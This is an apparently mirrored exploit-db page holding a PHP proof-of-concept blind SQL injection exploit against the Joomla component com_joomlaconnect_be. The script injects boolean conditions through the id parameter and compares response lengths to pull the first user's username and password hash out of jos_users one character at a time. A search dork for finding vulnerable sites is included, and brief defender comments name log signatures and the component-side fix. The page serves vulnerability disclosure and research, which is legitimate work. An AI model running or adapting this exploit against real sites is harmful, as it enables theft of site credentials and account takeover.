Joomla! Component com_Joomlaconnect_be – Blind SQL Injection

  • 作者: snakespc
    日期: 2010-02-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11578/
  • #!/usr/bin/php
    <?php
    // Proof-of-concept script as published on exploit-db (metadata in the page
    // header above). It performs a boolean-based blind SQL injection through the
    // last query parameter (`id`, per the usage line in the banner) of the Joomla
    // com_joomlaconnect_be component: every request appends a SQL condition to
    // the URL given in $argv[1] and classifies the response as "true" or "false"
    // purely by comparing its byte length against a baseline, one bit per request.
    //
    // Defender notes (from reading the code below, not from testing it):
    //  - Each request carries one of the literal fragments `+and+1=1--`,
    //    `+and+1=0--` or `ascii(substring((select+...+from+jos_users+limit+0,1),`
    //    in the query string. Those strings are easy to match in web-server
    //    access logs or WAF rules, and a full run shows up as a burst of tens
    //    of near-identical requests from one client that differ only in a
    //    position index and a comparison value.
    //  - The root cause is presumably the component passing the `id` value into
    //    SQL without binding or casting; the remedy is on the component side
    //    (prepared statements / integer cast), not anything about this script.
    // Disable the script time limit: the loops below issue many sequential
    // HTTP requests and would otherwise be cut off.
    ini_set("max_execution_time",0);
    print_r('
    ###########################################################################
    [»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability
    ###########################################################################
    [»] Script: [Joomla]
    [»] Language: [ PHP ]
    [»] Founder:[ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
    [»] Greetz to:[ Spécial >>>>His0k4 >>>> Tous les hackers Algérie
    [»] Dork: inurl:index.php?option=com_joomlaconnect_be
    ###########################################################################
    
    ###########################################################################
    #
    #Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit
    #[x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3
    #
    #
    ###########################################################################
    ');
    // The target URL is the single CLI argument; with no argument only the
    // banner above is printed.
    if ($argc > 1) {
    $url = $argv[1];
    // Baseline: $r is the response length for an always-true condition, $w for
    // an always-false one. file_get_contents() returns false on failure and
    // nothing here checks for that.
    $r = strlen(file_get_contents($url."+and+1=1--"));
    echo "\nExploiting:\n";
    $w = strlen(file_get_contents($url."+and+1=0--"));
    // $t is the percentage by which the "false" page differs from the "true"
    // page; every later response whose deviation from $r exceeds ($t - 1) is
    // treated as a "false" answer.
    $t = abs((100-($w/$r*100)));
    echo "Username: ";
    // Determine the username length (up to 30): the first position whose
    // ascii() is 0 (i.e. the condition is "false") marks the end of the string.
    // $count ends up as length + 1; `$i = 30` is the loop-break idiom used
    // throughout this script.
    for ($i=1; $i <= 30; $i++) {
    $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
     if (abs((100-($laenge/$r*100))) > $t-1) {
    $count = $i;
    $i = 30;
     }
    }
    // Recover the username one character per position $j. $i walks the ascii
    // range in steps of two (46..58, then the jump at 60 skips straight to
    // 98..122). The first $i for which `ascii(...) > $i` is "false" bounds the
    // character to {$i-1, $i}; the second request (`> $i-1`) picks which one.
    // Because of the jump, only characters in roughly 45–58 and 97–122 are
    // reported exactly; anything else is reported as the nearest scanned value.
    for ($j = 1; $j < $count; $j++) {
     for ($i = 46; $i <= 122; $i=$i+2) {
    if ($i == 60) {
     $i = 98;
    }
    $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
    if (abs((100-($laenge/$r*100))) > $t-1) {
     $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
     if (abs((100-($laenge/$r*100))) > $t-1) {
    echo chr($i-1);
     } else {
    echo chr($i);
     }
     // character found: force the inner loop to end
     $i = 122;
    }
     }
    }
    echo "\nPassword: ";
    // Same two-request-per-character scheme for the password hash, over a fixed
    // 49 positions and a narrower range (46..58, then 98..102), which after the
    // `$i-1` resolution covers the digits and a–f.
    for ($j = 1; $j <= 49; $j++) {
     for ($i = 46; $i <= 102; $i=$i+2) {
    if ($i == 60) {
     $i = 98;
    }
    $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
    if (abs((100-($laenge/$r*100))) > $t-1) {
     $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
     if (abs((100-($laenge/$r*100))) > $t-1) {
    echo chr($i-1);
     } else {
    echo chr($i);
     }
     // character found: force the inner loop to end
     $i = 102;
    }
     }
    }
    }
    ?>